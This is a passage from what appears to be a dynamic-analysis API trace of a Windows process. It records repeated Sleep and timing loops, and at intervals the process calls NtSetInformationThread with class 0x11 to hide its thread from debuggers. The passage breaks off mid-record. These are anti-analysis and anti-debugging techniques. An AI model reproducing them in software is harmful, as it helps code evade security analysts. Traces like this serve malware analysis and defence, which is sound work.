GetTickCount () returned 0x1d4cf54 [0190.040] Sleep (dwMilliseconds=0x3e8) [0190.165] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x19, wMilliseconds=0x3e3)) [0190.166] GetTickCount () returned 0x1d4d3b8 [0190.166] Sleep (dwMilliseconds=0x3e8) [0190.274] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1a, wMilliseconds=0x68)) [0190.274] GetTickCount () returned 0x1d4d80c [0190.274] Sleep (dwMilliseconds=0x3e8) [0190.368] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1a, wMilliseconds=0xc6)) [0190.368] GetTickCount () returned 0x1d4dc51 [0190.368] Sleep (dwMilliseconds=0x3e8) [0190.461] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1a, wMilliseconds=0x124)) [0190.461] GetTickCount () returned 0x1d4e095 [0190.461] Sleep (dwMilliseconds=0x3e8) [0190.570] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1a, wMilliseconds=0x191)) [0190.570] GetTickCount () returned 0x1d4e4e9 [0190.570] Sleep (dwMilliseconds=0x3e8) [0190.712] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1a, wMilliseconds=0x21d)) [0190.713] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0190.713] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0190.714] GetCurrentThread () returned 0xfffffffe [0190.714] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0190.714] GetTickCount () returned 0x1d4e95d [0190.714] Sleep (dwMilliseconds=0x3e8) [0190.805] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1a, wMilliseconds=0x27b)) [0190.805] GetTickCount () returned 0x1d4eda1 [0190.808] Sleep (dwMilliseconds=0x3e8) [0190.898] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1a, wMilliseconds=0x2d8)) [0190.898] GetTickCount () returned 0x1d4f1e6 [0190.898] Sleep (dwMilliseconds=0x3e8) [0191.015] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1a, wMilliseconds=0x346)) [0191.016] GetTickCount () returned 0x1d4f63a [0191.016] Sleep (dwMilliseconds=0x3e8) [0191.231] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1b, wMilliseconds=0x38)) [0191.231] GetTickCount () returned 0x1d4fafc [0191.231] Sleep (dwMilliseconds=0x3e8) [0191.322] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1b, wMilliseconds=0x96)) [0191.323] GetTickCount () returned 0x1d4ff40 [0191.323] Sleep (dwMilliseconds=0x3e8) [0191.370] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1b, wMilliseconds=0xc4)) [0191.370] GetTickCount () returned 0x1d50356 [0191.370] Sleep (dwMilliseconds=0x3e8) [0191.417] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1b, wMilliseconds=0xf3)) [0191.417] GetTickCount () returned 0x1d5076c [0191.417] Sleep (dwMilliseconds=0x3e8) [0191.463] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1b, wMilliseconds=0x122)) [0191.463] GetTickCount () returned 0x1d50b82 [0191.463] Sleep (dwMilliseconds=0x3e8) [0191.510] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1b, wMilliseconds=0x151)) [0191.511] GetTickCount () returned 0x1d50f97 [0191.511] Sleep (dwMilliseconds=0x3e8) [0191.554] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1b, wMilliseconds=0x180)) [0191.554] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0191.555] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0191.555] GetCurrentThread () returned 0xfffffffe [0191.555] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0191.555] GetTickCount () returned 0x1d513ad [0191.555] Sleep (dwMilliseconds=0x3e8) [0191.600] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1b, wMilliseconds=0x1ae)) [0191.600] GetTickCount () returned 0x1d517c3 [0191.600] Sleep (dwMilliseconds=0x3e8) [0191.647] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1b, wMilliseconds=0x1dd)) [0191.647] GetTickCount () returned 0x1d51bd9 [0191.647] Sleep (dwMilliseconds=0x3e8) [0191.694] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1b, wMilliseconds=0x20c)) [0191.694] GetTickCount () returned 0x1d51fef [0191.695] Sleep (dwMilliseconds=0x3e8) [0191.740] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1b, wMilliseconds=0x23b)) [0191.740] GetTickCount () returned 0x1d52404 [0191.740] Sleep (dwMilliseconds=0x3e8) [0191.787] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1b, wMilliseconds=0x26a)) [0191.787] GetTickCount () returned 0x1d5281a [0191.787] Sleep (dwMilliseconds=0x3e8) [0191.834] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1b, wMilliseconds=0x298)) [0191.834] GetTickCount () returned 0x1d52c30 [0191.834] Sleep (dwMilliseconds=0x3e8) [0191.881] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1b, wMilliseconds=0x2c7)) [0191.881] GetTickCount () returned 0x1d53046 [0191.881] Sleep (dwMilliseconds=0x3e8) [0191.928] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1b, wMilliseconds=0x2f6)) [0191.928] GetTickCount () returned 0x1d5345c [0191.928] Sleep (dwMilliseconds=0x3e8) [0191.974] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1b, wMilliseconds=0x325)) [0191.974] GetTickCount () returned 0x1d53871 [0191.975] Sleep (dwMilliseconds=0x3e8) [0192.042] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1b, wMilliseconds=0x363)) [0192.043] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0192.043] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0192.043] GetCurrentThread () returned 0xfffffffe [0192.043] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0192.044] GetTickCount () returned 0x1d53c97 [0192.044] Sleep (dwMilliseconds=0x3e8) [0192.183] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1c, wMilliseconds=0x8)) [0192.183] GetTickCount () returned 0x1d5410a [0192.183] Sleep (dwMilliseconds=0x3e8) [0192.265] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1c, wMilliseconds=0x56)) [0192.265] GetTickCount () returned 0x1d5453f [0192.265] Sleep (dwMilliseconds=0x3e8) [0192.306] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1c, wMilliseconds=0x84)) [0192.306] GetTickCount () returned 0x1d54955 [0192.306] Sleep (dwMilliseconds=0x3e8) [0192.354] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1c, wMilliseconds=0xb3)) [0192.354] GetTickCount () returned 0x1d54d6b [0192.354] Sleep (dwMilliseconds=0x3e8) [0192.396] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1c, wMilliseconds=0xe2)) [0192.396] GetTickCount () returned 0x1d55181 [0192.396] Sleep (dwMilliseconds=0x3e8) [0192.443] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1c, wMilliseconds=0x111)) [0192.443] GetTickCount () returned 0x1d55596 [0192.443] Sleep (dwMilliseconds=0x3e8) [0192.490] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1c, wMilliseconds=0x140)) [0192.490] GetTickCount () returned 0x1d559ac [0192.490] Sleep (dwMilliseconds=0x3e8) [0192.536] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1c, wMilliseconds=0x16e)) [0192.536] GetTickCount () returned 0x1d55dc2 [0192.537] Sleep (dwMilliseconds=0x3e8) [0192.583] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1c, wMilliseconds=0x19d)) [0192.583] GetTickCount () returned 0x1d561d8 [0192.583] Sleep (dwMilliseconds=0x3e8) [0192.723] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1c, wMilliseconds=0x22a)) [0192.724] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0192.725] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0192.725] GetCurrentThread () returned 0xfffffffe [0192.725] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0192.725] GetTickCount () returned 0x1d5664b [0192.725] Sleep (dwMilliseconds=0x3e8) [0192.771] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1c, wMilliseconds=0x258)) [0192.771] GetTickCount () returned 0x1d56a61 [0192.771] Sleep (dwMilliseconds=0x3e8) [0192.819] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1c, wMilliseconds=0x287)) [0192.819] GetTickCount () returned 0x1d56e77 [0192.819] Sleep (dwMilliseconds=0x3e8) [0192.864] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1c, wMilliseconds=0x2b6)) [0192.864] GetTickCount () returned 0x1d5728d [0192.864] Sleep (dwMilliseconds=0x3e8) [0192.913] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1c, wMilliseconds=0x2e5)) [0192.913] GetTickCount () returned 0x1d576a2 [0192.913] Sleep (dwMilliseconds=0x3e8) [0192.957] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1c, wMilliseconds=0x314)) [0192.957] GetTickCount () returned 0x1d57ab8 [0192.957] Sleep (dwMilliseconds=0x3e8) [0193.017] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1c, wMilliseconds=0x342)) [0193.017] GetTickCount () returned 0x1d57ece [0193.017] Sleep (dwMilliseconds=0x3e8) [0193.066] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1c, wMilliseconds=0x381)) [0193.066] GetTickCount () returned 0x1d582f3 [0193.066] Sleep (dwMilliseconds=0x3e8) [0193.129] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1c, wMilliseconds=0x3bf)) [0193.129] GetTickCount () returned 0x1d58719 [0193.129] Sleep (dwMilliseconds=0x3e8) [0193.176] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1d, wMilliseconds=0x6)) [0193.176] GetTickCount () returned 0x1d58b2f [0193.176] Sleep (dwMilliseconds=0x3e8) [0193.198] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1d, wMilliseconds=0x16)) [0193.199] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0193.199] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0193.199] GetCurrentThread () returned 0xfffffffe [0193.199] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0193.200] GetTickCount () returned 0x1d58f25 [0193.200] Sleep (dwMilliseconds=0x3e8) [0193.210] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1d, wMilliseconds=0x25)) [0193.210] GetTickCount () returned 0x1d5931c [0193.210] Sleep (dwMilliseconds=0x3e8) [0193.254] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1d, wMilliseconds=0x54)) [0193.254] GetTickCount () returned 0x1d59732 [0193.254] Sleep (dwMilliseconds=0x3e8) [0193.347] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1d, wMilliseconds=0xb2)) [0193.347] GetTickCount () returned 0x1d59b76 [0193.347] Sleep (dwMilliseconds=0x3e8) [0193.441] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1d, wMilliseconds=0x10f)) [0193.441] GetTickCount () returned 0x1d59fbb [0193.442] Sleep (dwMilliseconds=0x3e8) [0193.535] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1d, wMilliseconds=0x16d)) [0193.535] GetTickCount () returned 0x1d5a3ff [0193.535] Sleep (dwMilliseconds=0x3e8) [0193.660] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1d, wMilliseconds=0x1ea)) [0193.660] GetTickCount () returned 0x1d5a863 [0193.660] Sleep (dwMilliseconds=0x3e8) [0193.701] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1d, wMilliseconds=0x209)) [0193.701] GetTickCount () returned 0x1d5ac69 [0193.701] Sleep (dwMilliseconds=0x3e8) [0193.754] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1d, wMilliseconds=0x247)) [0193.754] GetTickCount () returned 0x1d5b08f [0193.754] Sleep (dwMilliseconds=0x3e8) [0193.863] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1d, wMilliseconds=0x2b4)) [0193.863] GetTickCount () returned 0x1d5b4e3 [0193.863] Sleep (dwMilliseconds=0x3e8) [0193.940] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1d, wMilliseconds=0x302)) [0193.941] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0193.941] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0193.941] GetCurrentThread () returned 0xfffffffe [0193.941] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0193.942] GetTickCount () returned 0x1d5b918 [0193.942] Sleep (dwMilliseconds=0x3e8) [0194.034] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1d, wMilliseconds=0x360)) [0194.034] GetTickCount () returned 0x1d5bd5d [0194.034] Sleep (dwMilliseconds=0x3e8) [0194.208] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1e, wMilliseconds=0x24)) [0194.208] GetTickCount () returned 0x1d5c1ef [0194.208] Sleep (dwMilliseconds=0x3e8) [0194.319] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1e, wMilliseconds=0x91)) [0194.319] GetTickCount () returned 0x1d5c643 [0194.319] Sleep (dwMilliseconds=0x3e8) [0194.410] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1e, wMilliseconds=0xee)) [0194.410] GetTickCount () returned 0x1d5ca88 [0194.410] Sleep (dwMilliseconds=0x3e8) [0194.487] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1e, wMilliseconds=0x13c)) [0194.487] GetTickCount () returned 0x1d5cebd [0194.487] Sleep (dwMilliseconds=0x3e8) [0194.580] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1e, wMilliseconds=0x19a)) [0194.580] GetTickCount () returned 0x1d5d302 [0194.581] Sleep (dwMilliseconds=0x3e8) [0194.661] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1e, wMilliseconds=0x1e8)) [0194.661] GetTickCount () returned 0x1d5d737 [0194.661] Sleep (dwMilliseconds=0x3e8) [0194.837] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1e, wMilliseconds=0x294)) [0194.837] GetTickCount () returned 0x1d5dbc9 [0194.837] Sleep (dwMilliseconds=0x3e8) [0194.879] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1e, wMilliseconds=0x2c2)) [0194.879] GetTickCount () returned 0x1d5dfdf [0194.879] Sleep (dwMilliseconds=0x3e8) [0195.001] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1e, wMilliseconds=0x33f)) [0195.002] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0195.002] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0195.002] GetCurrentThread () returned 0xfffffffe [0195.002] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0195.002] GetTickCount () returned 0x1d5e443 [0195.002] Sleep (dwMilliseconds=0x3e8) [0195.157] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1e, wMilliseconds=0x3db)) [0195.157] GetTickCount () returned 0x1d5e8c6 [0195.157] Sleep (dwMilliseconds=0x3e8) [0195.269] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1f, wMilliseconds=0x60)) [0195.269] GetTickCount () returned 0x1d5ed1a [0195.269] Sleep (dwMilliseconds=0x3e8) [0195.391] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1f, wMilliseconds=0xdd)) [0195.391] GetTickCount () returned 0x1d5f17e [0195.392] Sleep (dwMilliseconds=0x3e8) [0195.441] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1f, wMilliseconds=0x10c)) [0195.441] GetTickCount () returned 0x1d5f594 [0195.441] Sleep (dwMilliseconds=0x3e8) [0195.532] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1f, wMilliseconds=0x16a)) [0195.532] GetTickCount () returned 0x1d5f9d8 [0195.532] Sleep (dwMilliseconds=0x3e8) [0195.623] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1f, wMilliseconds=0x1b8)) [0195.623] GetTickCount () returned 0x1d5fe0d [0195.624] Sleep (dwMilliseconds=0x3e8) [0195.677] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: 